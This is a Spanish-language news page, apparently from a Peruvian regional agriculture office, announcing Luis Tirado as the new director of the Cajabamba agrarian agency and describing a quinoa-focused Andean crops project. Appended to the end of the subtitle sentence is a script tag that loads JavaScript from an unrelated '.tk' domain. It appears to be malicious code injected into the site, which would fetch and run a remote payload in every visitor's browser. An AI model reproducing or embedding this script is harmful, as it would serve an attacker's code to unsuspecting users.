Ingresar

DRAC DESIGNA NUEVO DIRECTOR EN AGENCIA AGRARIA CAJABAMBA

Jueves, 12 Abril, 2018 - 12:03
Luis Tirado asume la responsabilidad de trabajar a favor del sector agropecuario de esa provincia.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

El director regional de Agricultura de Cajamarca, Herman Bueno Cabrera, presentó al nuevo director de la Agencia Agraria de Cajabamba, Luis Tirado Tirado, quien asume la responsabilidad de trabajar por el sector agropecuario de esa provincia.

Luis Tirado se desempeñaba como coordinador zonal el proyecto de Cultivos Andinos en la provincia de Cajabamba que ejecuta la DRAC.

Bueno Cabrera manifestó que realizan algunos cambios para mejorar la gestión a favor del sector agropecuario de la provincia de Cajabamba, ya que se busca llegar más a los agricultores, ya que es la única forma de contribuir con ellos.

En otro momento, el funcionario regional dijo que en esta importante provincia se ejecuta el proyecto de Cultivos Andinos, que beneficia a 153 productores, de los distritos de Condebamba, Sitacocha, Cachachi y Cajabamba.

También informó que se sembró 55 hectáreas de los productos andinos, especialmente la quinua, además se viene brindando capacitaciones, charlas, entre otras acciones; siempre a favor de los productores de Cajabamba.

AdjuntoTamaño
PDF icon descargue222.07 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen